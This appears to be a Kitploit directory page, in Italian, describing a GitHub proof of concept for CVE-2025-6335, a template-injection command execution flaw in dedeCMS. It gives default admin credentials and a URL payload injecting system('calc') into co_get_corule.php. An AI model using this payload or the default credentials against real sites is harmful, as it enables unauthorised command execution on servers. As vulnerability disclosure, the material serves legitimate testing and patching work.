Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-6335 — cve报告 | Kitploit
Strumenti/GitHubGitHub/jujubooom/cve-2025-6335
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubjujubooom/cve-2025-6335

CVE-2025-6335

cve报告

Vedi Repository
61 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Titolo: Vulnerabilità di esecuzione di comandi tramite iniezione di template in dedeCMS 5.7 sp2

BUG_Author: Ewoji

Versione interessata: dedeCMS < 5.7.2

Fornitore: Shanghai Zhuozhuo Network Technology Co., LTD

Software: dedeCMS

File vulnerabili:

  • /include/dedetag.class.php

Descrizione:

  1. Dopo l'installazione, accedi al pannello di amministrazione

    • Usa le credenziali predefinite admin/admin
  2. Sfruttamento del template

    • Accedi all'interfaccia dede/co_get_corule.php
    • Inserisci il parametro /dede/co_get_corule.php? notes={dede:"); system('calc'); ///}&job=1, accedendo due volte in questo modo si può eseguire il comando
  3. Verifica dello sfruttamento:

    • Se l'iniezione ha successo, l'attaccante può eseguire comandi arbitrari

Prova di concetto:

root@kitploit:~
/dede/co_get_corule.php?notes={dede:");system('calc');///}&job=1
Accedendo due volte in questo modo si può eseguire il comando

Dettaglio:CVE-2025-6335-dedeCMS iniezione di template nel backend RCE

Scarica lo strumento